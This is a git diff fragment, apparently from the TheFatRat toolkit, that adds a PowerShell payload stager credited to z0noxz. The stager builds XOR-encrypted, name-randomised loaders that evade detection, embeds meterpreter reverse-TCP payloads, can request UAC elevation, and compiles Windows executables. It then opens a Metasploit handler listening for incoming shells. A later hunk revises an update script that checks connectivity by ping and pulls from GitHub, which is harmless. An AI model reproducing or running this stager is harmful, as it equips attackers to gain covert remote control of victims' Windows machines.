dynamic_variable() + ).replace( + "[_PS_VAR_PAYLOAD_]", + dynamic_variable() + ).replace( + "[_PS_WF_]", + dynamic_variable() + ).replace( + "[_PS_VAR_X_]", + dynamic_variable() + ).replace( + "[_PS_VAR_I_]", + dynamic_variable() + ).replace( + "[_PS_ARCHITECTURE_]", + "64" if architecture == "win64" else "32" + ).replace( + "[_PS_PAYLOAD_]", + payload + ) + + +# Generates injection payload powershell block +# Generates injection payloads either from templates or from path +def gen_injection_payload(_ag): + global powershell_payloads + + # Create an empty holder for an embedded payload + payload_embedded = "" + + # Check what to generate + if (("path" in _ag) and (_ag["path"] != "")): + with open(_ag["path"], "r") as _file: + payload_embedded = ps_base64encode(_file.read()) + elif ("meterpreter" in _ag): + payload_embedded = ps_base64encode( + gen_injection( + powershell_payloads["meterpreter"].replace( + "[_LPORT_],[_LHOST_]", + _lformat(_ag["lhost"], _ag["lport"]) + ), _ag["target"] + ) + ) + + if ("generate" in _ag): + with open(_ag["output"], "w") as dump: + dump.write(gen_ec(payload_embedded)) + Print.add_name_value("File signature", hashlib.md5(open(_ag["output"], "rb").read()).hexdigest(), Print.info) + Print.success("Payload generated : " + _ag["output"]) + sys.exit() + + return payload_embedded + + +# Generates source +def gen_source(_ag): + global c_source, c_source_embedded + + if (("url" in _ag) and (_ag["url"] != "")): + + val_key = [] + val_str = [ + ord(x) for x in gen_main( + gen_ec( + ps_base64encode( + gen_base64_decoder(_ag["url"]) + ), True + ), "use-elevation" in _ag + ) + ] + + for i in range(len(val_str)): + val_key.append(random.randint(0, 255)) + val_str[i] = val_str[i] ^ val_key[i] + + Print.add_name_value("Payload size", str(len(val_str)) + " bytes", Print.info) + + return c_source.replace( + "[_VAR_STR_]", + dynamic_variable() + ).replace( + "[_VAL_STR_]", + ",".join(str(x) for x in val_str) + ",0" # append \0 for zero termination (0 xor 0 equals 0) + ).replace( + "[_VAR_KEY_]", + dynamic_variable() + ).replace( + "[_VAL_KEY_]", + ",".join(str(x) for x in val_key) + ",0" # append \0 for zero termination (0 xor 0 equals 0) + ).replace( + "[_VAR_X_]", + dynamic_variable() + ) + else: + + # Generate a temporary file name for later use + remote_tmp_file = dynamic_variable() + encryption_key = "".join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for x in range(random.randint(24, 48))) + + Print.add_name_value("Temp file", remote_tmp_file, Print.info) + Print.add_name_value("Encryption key", encryption_key, Print.info) + + val_key = [] + val_str = [ + ord(x) for x in gen_main( + gen_ec( + ps_base64encode( + gen_ec( + gen_xor_decryptor( + "$env:temp+'\\" + remote_tmp_file + "'", + encryption_key + ) + # Remove temp file (note no plus-sign after temp) + + (";Remove-Item $env:temp'\\" + remote_tmp_file + "'") + ) + ), True + ) + ) + ] + + val_key_emb = [] + val_str_emb = [ord(x) for x in gen_injection_payload(_ag)] + + for i in range(len(val_str)): + val_key.append(random.randint(0, 255)) + val_str[i] = val_str[i] ^ val_key[i] + + # Initial encryption with generated key + for i in range(len(val_str_emb)): + val_str_emb[i] = val_str_emb[i] ^ ord(encryption_key[i % len(encryption_key)]) + + # Second encryption with stored key + for i in range(len(val_str_emb)): + val_key_emb.append(random.randint(0, 255)) + val_str_emb[i] = val_str_emb[i] ^ val_key_emb[i] + + Print.add_name_value("Payload size", str(len(val_str)) + " bytes", Print.info) + Print.add_name_value("Embedded size", str(len(val_str_emb)) + " bytes", Print.info) + + return c_source_embedded.replace( + "[_VAR_PATH_]", + dynamic_variable() + ).replace( + "[_VAR_TEMP_]", + dynamic_variable() + ).replace( + "[_TMP_FILENAME_]", + remote_tmp_file + ).replace( + "[_VAR_FILE_]", + dynamic_variable() + ).replace( + "[_VAR_STR_STG_]", + dynamic_variable() + ).replace( + "[_VAL_STR_STG_]", + ",".join(str(x) for x in val_str) + ",0" # append \0 for zero termination (0 xor 0 equals 0) when using strings ONLY + ).replace( + "[_VAR_KEY_STG_]", + dynamic_variable() + ).replace( + "[_VAL_KEY_STG_]", + ",".join(str(x) for x in val_key) + ",0" # append \0 for zero termination (0 xor 0 equals 0) when using strings ONLY + ).replace( + "[_VAR_STR_EMB_]", + dynamic_variable() + ).replace( + "[_VAL_STR_EMB_]", + ",".join(str(x) for x in val_str_emb) + ).replace( + "[_VAR_KEY_EMB_]", + dynamic_variable() + ).replace( + "[_VAL_KEY_EMB_]", + ",".join(str(x) for x in val_key_emb) + ).replace( + "[_VAR_X_]", + dynamic_variable() + ) + + +# Print program header in terminal +def print_header(): + Print.text("\033[38;5;160m" + r" ___ __ _ " + "\033[0m") + Print.text("\033[38;5;161m" + r" / _ \_____ _____ _ __/ _\ |_ __ _ __ _ ___ _ __ " + "\033[0m") + Print.text("\033[38;5;162m" + r" / /_)/ _ \ \ /\ / / _ \ '__\ \| __/ _` |/ _` |/ _ \ '__|" + "\033[0m") + Print.text("\033[38;5;163m" + r"/ ___/ (_) \ V V / __/ | _\ \ || (_| | (_| | __/ | " + "\033[0m") + Print.text("\033[38;5;164m" + r"\/ \___/ \_/\_/ \___|_| \__/\__\__,_|\__, |\___|_| " + "\033[0m") + Print.text("\033[38;5;130m" + r" _ __ _ _ " + "\033[38;5;164m|___/\033[38;5;130m " + "\033[0m") + Print.text("\033[38;5;131m" + r" | '_ \| | | | " + "\033[0m") + Print.text("\033[38;5;132m" + r" _| |_) | |_| | A payload stager using PowerShell " + "\033[0m") + Print.text("\033[38;5;133m" + r"(_) .__/ \__, | Created by z0noxz " + "\033[0m") + Print.text("\033[38;5;134m" + r" |_| |___/ " + "\033[0m") + + +def main(argv): + global help_notes + + _ag = {} + + print_header() + + help_notes = help_notes.replace("[_CHECK_i686_]", "\033[92mpresent\033[0m" if which("i686-w64-mingw32-gcc") else "\033[91mmissing\033[0m") + help_notes = help_notes.replace("[_CHECK_x86_64_]", "\033[92mpresent\033[0m" if which("x86_64-w64-mingw32-gcc") else "\033[91mmissing\033[0m") + + try: + opts, args = getopt.getopt( + argv, + "hu:p:mo:t:eg", + [ + "help", + "url=", + "path=", + "meterpreter", + "output=", + "target=", + "lhost=", + "lport=", + "use-elevation", + "listener", + "generate", + ] + ) + except getopt.GetoptError as e: + print(help_notes) + Print.error(str(e)) + sys.exit(2) + for opt, arg in opts: + if opt in ("-h", "--help"): + print(help_notes) + sys.exit() + elif opt in ("-u", "--url"): + _ag["url"] = arg + elif opt in ("-p", "--path"): + _ag["path"] = arg + elif opt in ("-m", "--meterpreter"): + _ag["meterpreter"] = arg + elif opt in ("-o", "--output"): + _ag["output"] = arg + elif opt in ("-t", "--target"): + _ag["target"] = arg + elif opt in ("--lhost"): + _ag["lhost"] = arg + elif opt in ("--lport"): + _ag["lport"] = arg + elif opt in ("-e", "--use-elevation"): + _ag["use-elevation"] = arg + elif opt in ("--listener"): + _ag["listener"] = True + elif opt in ("-g", "--generate"): + _ag["generate"] = arg + + Print.text("") + + if (not which("i686-w64-mingw32-gcc")) or (not which("x86_64-w64-mingw32-gcc")): + Print.error("mingw does not seem to be installed on your system") + sys.exit(2) + + if (("url" not in _ag) or (_ag["url"] == "")) and (("path" not in _ag) or (_ag["path"] == "")) and ("meterpreter" not in _ag): + Print.error("A method parameter is missing, or empty") + sys.exit(2) + elif not (("url" not in _ag) or (_ag["url"] == "")) and not (("path" not in _ag) or (_ag["path"] == "")) and not ("meterpreter" not in _ag): + Print.error("Only one method parameter is allowed") + sys.exit(2) + elif not (("url" not in _ag) or (_ag["url"] == "")): + Print.add_name_value("URL", _ag["url"], Print.info) + elif not (("path" not in _ag) or (_ag["path"] == "")): + Print.add_name_value("PATH", _ag["path"], Print.info) + elif ("meterpreter" in _ag): + if (("lhost" in _ag) and (_ag["lhost"] != "")) and (("lport" in _ag) and (_ag["lport"] != "")): + Print.add_name_value("Shell listener", _ag["lhost"] + ":" + _ag["lport"], Print.info) + else: + Print.error("LHOST and LPORT must be specified when generating a meterpreter payload") + sys.exit(2) + if ("listener" in _ag) and (_ag["listener"]): + Print.add_name_value("MSF Listener", "MSF listener will open automatically", Print.info) + + if ("output" not in _ag) or (_ag["output"] == ""): + Print.error("'output' parameter is missing, or empty") + sys.exit(2) + else: + Print.add_name_value("Output", _ag["output"], Print.info) + + if ("target" not in _ag) or (_ag["target"] == ""): + Print.error("'target' parameter is missing, or empty") + sys.exit(2) + elif (_ag["target"] == "win32") or (_ag["target"] == "win64"): + Print.add_name_value("Target", _ag["target"].lower(), Print.info) + else: + Print.error("'target' must be either win32 or win64") + sys.exit(2) + + if ("use-elevation" in _ag): + Print.add_name_value("Invoke with elevation", "Yes", Print.info) + Print.warning("- This may trigger the UAC") + + compile(gen_source(_ag), _ag["output"], _ag["target"]) + Print.name_value_print() + + ## Last minute addition + ## TODO :: Add better interactivity through 'popen' if possible, else scrap feature + if ("listener" in _ag) and (_ag["listener"]): + Print.text() + Print.info("Note: MSF will stay open after session ends") + Print.status("Opening MSF listener...") + # hardcoded to use x64 meterpreter for now + os.system("msfconsole -x \"use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;exploit\" -q") + +if __name__ == "__main__": + main(sys.argv[1:]) diff --git a/update b/update old mode 100755 new mode 100644 index d10d56e..e1c1924 --- a/update +++ b/update @@ -9,24 +9,69 @@ yellow='\e[1;33m' blue='\e[1;34m' purple='\e[1;35m' -ping -c 1 google.com > /dev/null 2>&1 - if [ "$?" != 0 ] - +function chknet() { +echo -e $red "[X] Your Internet is not working correctly!" +sleep 1 +echo -e $cyan "[*] Checking ...." +ping -c 1 8.8.4.4 > /dev/null 2>&1 +png="$?" + if [ $png == "0" ] then - - echo -e $red [Internet Connection]: OFFLINE!; - echo -e $red You need to be connected to internet to be able to update fatrat; - sleep 1 - exit 1 - -else - echo -e $green [✔]::[Internet Connection]: connected!; + echo -e $red "[X] Your linux OS is not able to resolve" + echo -e $red "hostnames over terminal using ping !!" echo "" + echo -e $yellow "Search on the web : (unable to resolve hostnames ping) to find a solution" +echo "" +echo -e $green "Update will continue , but is not garantee that cloud work properly." +echo "" +echo -e $cyan "Update will continue because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS = Success" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue sleep 1 +elif [ $png == "1" ] +then + echo -e $yellow "You are connected to your local network but not to the web ." + echo -e $yellow "Check if your router/modem gateway is connected to the web ." +echo "" +echo -e $green "Update will not continue , you are only connected to your local lan." +echo "" +echo -e $cyan "Update will stop because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS =$red Failed" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +exit 1 +sleep 1 +elif [ $png == "2" ] +then +echo -e $red "You are not connected to any network ." +echo "" +echo -e $cyan "Update will stop because :" +echo -e $green "Ping google.com =$red Failed" +echo -e $green "Ping google DNS =$red Failed" +echo "" +echo -e $green "Press [ENTER] key to continue" +read continue +exit 1 + sleep 1 +fi +} +ping -c 1 google.com > /dev/null 2>&1 +png="$?" + if [ $png != 0 ] +then +chknet +fi +sleep 1 echo -e $cyan "************************************" echo -e $cyan "** $green Updating Fatrat from Github $cyan **" echo -e $cyan "************************************" sleep 3 +git checkout master git pull origin master echo -e $cyan "*************************"